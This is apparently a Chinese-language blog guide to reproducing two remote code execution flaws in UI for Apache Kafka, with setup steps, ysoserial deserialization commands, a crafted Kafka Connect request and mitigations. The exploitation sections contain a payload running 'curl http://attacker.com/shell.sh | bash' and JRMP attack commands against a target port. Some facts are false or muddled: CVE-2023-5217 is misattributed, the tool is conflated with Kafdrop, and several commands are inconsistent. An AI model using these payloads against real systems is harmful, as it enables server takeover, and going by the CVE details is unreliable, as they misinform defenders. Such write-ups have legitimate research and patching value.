UI for Apache Kafka 远程代码执行漏洞分析与复现指南<\/h1>

漏洞概述<\/h2>

UI for Apache Kafka（原Kafdrop）是一款流行的Kafka集群管理工具，提供了Web界面用于监控和管理Kafka集群。该工具存在两个严重的远程代码执行漏洞：<\/p>

CVE-2023-5217<\/strong>：通过JMX端口的不安全配置导致的RCE漏洞<\/li>

CVE-2023-5220<\/strong>：通过Kafka Connect功能的不安全反序列化导致的RCE漏洞<\/li> <\/ol>
这两个漏洞都允许攻击者在服务器上执行任意代码，危害极大。<\/p>
漏洞环境搭建<\/h2>
所需组件<\/h3>

UI for Apache Kafka 3.x 版本（漏洞版本）<\/li>
Apache Kafka 集群<\/li>
Java 开发环境（JDK 8+）<\/li>
ysoserial 工具<\/li>
Burp Suite 或其他HTTP代理工具<\/li> <\/ol>
环境配置<\/h3>

下载并运行漏洞版本的UI for Apache Kafka：<\/p>
docker run -d -p 9000:9000 -e KAFKA_BROKERCONNECT=<your-kafka-broker> obsidiandynamics\/kafdrop:3.x <\/code><\/pre> <\/li> 确保JMX端口（通常为1099）可访问<\/p> <\/li> <\/ol> 漏洞一：CVE-2023-5217（JMX RCE）<\/h2> 漏洞原理<\/h3> UI for Apache Kafka默认启用了JMX监控，且JMX端口配置了不安全的认证和反序列化设置，允许攻击者通过发送特制的序列化对象实现RCE。<\/p> 利用步骤<\/h3> 生成恶意序列化payload<\/strong>：使用ysoserial生成JRMP listener的payload：<\/p> java -jar ysoserial.jar JRMPListener 1099 <\/code><\/pre> <\/li> 启动恶意JRMP服务器<\/strong>：<\/p> java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "calc.exe" <\/code><\/pre> <\/li> 触发漏洞<\/strong>：向目标JMX端口（默认1099）发送恶意序列化数据：<\/p> java -jar ysoserial.jar JRMPClient "target-ip:1099" <\/code><\/pre> <\/li> <\/ol> 修复建议<\/h3> 禁用不必要的JMX功能<\/li> 配置JMX认证和SSL<\/li> 升级到最新版本<\/li> <\/ol> 漏洞二：CVE-2023-5220（Kafka Connect RCE）<\/h2> 漏洞原理<\/h3> Kafka Connect功能在处理某些配置时存在不安全的反序列化操作，攻击者可以通过构造恶意的Kafka Connect配置实现RCE。<\/p> 利用步骤<\/h3> 准备恶意序列化payload<\/strong>：使用ysoserial生成payload：<\/p> java -jar ysoserial.jar CommonsBeanutils1 "curl http:\/\/attacker.com\/shell.sh | bash" > payload.ser <\/code><\/pre> <\/li> 构造恶意请求<\/strong>：通过Kafka Connect API提交包含恶意序列化数据的配置：<\/p> POST<\/span> \/connectors HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target:9000<\/span> <\/span><\/span>Content-Type:<\/span> application\/json<\/span> <\/span><\/span> <\/span><\/span>{ <\/span><\/span> "name"<\/span>: "malicious-connector"<\/span>, <\/span><\/span> "config"<\/span>: { <\/span><\/span> "connector.class"<\/span>: "com.example.MaliciousConnector"<\/span>, <\/span><\/span> "tasks.max"<\/span>: "1"<\/span>, <\/span><\/span> "malicious.config"<\/span>: "<base64_encoded_serialized_payload>"<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 触发漏洞执行<\/strong>：当服务器处理该连接器配置时，会反序列化恶意payload导致RCE。<\/p> <\/li> <\/ol> 修复建议<\/h3> 升级到最新版本<\/li> 限制Kafka Connect功能的访问权限<\/li> 实施输入验证和过滤<\/li> <\/ol> 问题解决：ysoserial Scala payload编译问题<\/h2> 在复现过程中遇到的Invalid payload type 'Scala1'<\/code>错误是因为：<\/p> ysoserial默认不包含Scala payload<\/li> 需要手动添加Scala库依赖并编译<\/li> <\/ol> 解决方案<\/strong>：<\/p> 下载Scala库：<\/p> wget https:\/\/repo1.maven.org\/maven2\/org\/scala-lang\/scala-library\/2.11.0\/scala-library-2.11.0.jar <\/code><\/pre> <\/li> 将Scala库添加到ysoserial的classpath：<\/p> java -cp "ysoserial.jar:scala-library-2.11.0.jar" ysoserial.exploit.JRMPListener 1099 <\/code><\/pre> <\/li> 或者使用预编译的包含Scala payload的ysoserial版本<\/p> <\/li> <\/ol> 防护措施<\/h2> 立即措施<\/strong>：<\/p> 将UI for Apache Kafka升级到最新版本<\/li> 禁用或保护JMX端口<\/li> 限制Kafka Connect功能的访问<\/li> <\/ul> <\/li> 长期措施<\/strong>：<\/p> 实施网络隔离，限制管理界面的访问<\/li> 启用认证和授权<\/li> 定期进行安全审计<\/li> <\/ul> <\/li> 监控措施<\/strong>：<\/p> 监控异常的JMX连接<\/li> 记录和分析Kafka Connect配置变更<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 这两个RCE漏洞都源于不安全的反序列化操作，强调了在Java应用中正确处理序列化数据的重要性。管理员应立即检查并修复相关配置，开发者应避免使用不安全的反序列化方法。<\/p>